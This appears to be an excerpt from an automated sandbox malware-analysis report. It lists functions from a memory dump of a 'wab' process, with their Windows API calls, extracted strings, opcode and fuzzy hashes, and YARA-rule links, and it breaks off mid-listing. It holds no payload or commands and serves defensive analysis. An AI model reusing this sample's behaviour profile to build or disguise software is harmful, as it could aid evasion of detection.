                                                                                                                                                                                                                    • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                                    • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@$wcslen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 239872665-3916222277
                                                                                                                                                                                                                    • Opcode ID: f3663e8288db930de81c623903cc877f8ba593c01bc576138108ca37437480ac
                                                                                                                                                                                                                    • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3663e8288db930de81c623903cc877f8ba593c01bc576138108ca37437480ac
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                                                    • String ID: %s (%s)$YV@
                                                                                                                                                                                                                    • API String ID: 3979103747-598926743
                                                                                                                                                                                                                    • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                                                    • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                                    • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                    • API String ID: 2780580303-317687271
                                                                                                                                                                                                                    • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                                    • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                                                                                                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                                                    • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                                    • API String ID: 2767993716-572158859
                                                                                                                                                                                                                    • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                                                    • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                    • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                                                                      • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                                    • API String ID: 3176057301-2039793938
                                                                                                                                                                                                                    • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                                                    • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                                                                    • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                                                                    • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                                                                    • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                                                                    • out of memory, xrefs: 0042F865
                                                                                                                                                                                                                    • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                                                                    • database is already attached, xrefs: 0042F721
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                                                    • API String ID: 1297977491-2001300268
                                                                                                                                                                                                                    • Opcode ID: 7e4b554c6cf2a7725b65294c40743cfb8927ad1f348c936232134d76ba50cb5c
                                                                                                                                                                                                                    • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e4b554c6cf2a7725b65294c40743cfb8927ad1f348c936232134d76ba50cb5c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040EB80
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040EB94
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                                                    • String ID: ($d
                                                                                                                                                                                                                    • API String ID: 1140211610-1915259565
                                                                                                                                                                                                                    • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                                                                                                                                                    • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                                                                                    • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3015003838-0
                                                                                                                                                                                                                    • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                                                    • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00407E7E
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00407ED7
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00407EEE
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00407F01
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 59245283-0
                                                                                                                                                                                                                    • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                                                                                    • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3467550082-0
                                                                                                                                                                                                                    • Opcode ID: 56e4a7d77988e94444627618330347d92b7c0f18510b370ca22fa361cd1098af
                                                                                                                                                                                                                    • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 56e4a7d77988e94444627618330347d92b7c0f18510b370ca22fa361cd1098af
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                    • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                                                    • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413ADC
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                                                                      • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413BD7
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                    • String ID: 3A
                                                                                                                                                                                                                    • API String ID: 3300951397-293699754
                                                                                                                                                                                                                    • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                                                    • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                      • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                                                                      • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                    • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                                                    • String ID: strings
                                                                                                                                                                                                                    • API String ID: 3166385802-3030018805
                                                                                                                                                                                                                    • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                                                    • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                    • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                                                    • String ID: AE$.cfg$General$EA
                                                                                                                                                                                                                    • API String ID: 776488737-1622828088
                                                                                                                                                                                                                    • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                                                    • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                                                                                    • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
